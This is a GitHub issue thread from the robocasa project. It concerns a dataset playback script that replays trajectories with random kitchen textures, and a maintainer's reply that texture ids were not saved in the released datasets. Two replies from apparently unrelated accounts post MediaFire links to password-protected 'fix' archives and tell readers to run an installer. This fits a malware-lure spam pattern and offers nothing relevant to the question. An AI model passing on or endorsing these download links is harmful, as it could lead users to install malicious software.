robocasa/robocasa #59: Issue with the playback dataset script

brunomachado37, 2024-08-27:
The `robomimic/scripts/playback_dataset.py` script actually renders random kitchen styles when replaying a trajectory from the dataset. Here it is an example of a trajectory re-played from the actions and the dataset observations:

https://github.com/user-attachments/assets/39575921-fc7a-4bd6-8ea8-40eb37dec338

https://github.com/user-attachments/assets/029497bd-6b01-4209-aee9-af85df292942

Is there a way of replaying a trajectory with the exact same kitchen style as in the original dataset observations?

Ps: This issue was already reported, but the [solution](https://github.com/robocasa/robocasa/issues/42#issuecomment-2254347068) provided was to use the `robomimic/scripts/playback_dataset.py` script, which does not solve the problem.

littleblack666333, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

yldzmuhammed, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

snasiriany, 2024-08-27:
Unfortunately with the particular datasets we released, there is no clean way to do this. This is because we didn't store the id of the textures used in the dataset. Normally this id information can be accessed like so:

```
import h5py
import json
f = h5py.File(PATH_TO_DATASET)
ep_meta = json.loads(f["data/demo_1"].attrs["ep_meta"])
gen_textures = ep_meta["gen_textures"] # returns {} right now
```

The `gen_textures` entry here is just a blank dictionary. We need to fix this going forward for future datasets. I hope that the dataset is still useful for your use case!

closed 2024-08-27 by snasiriany

brunomachado37, 2024-08-28:
Understood, thank you for your answer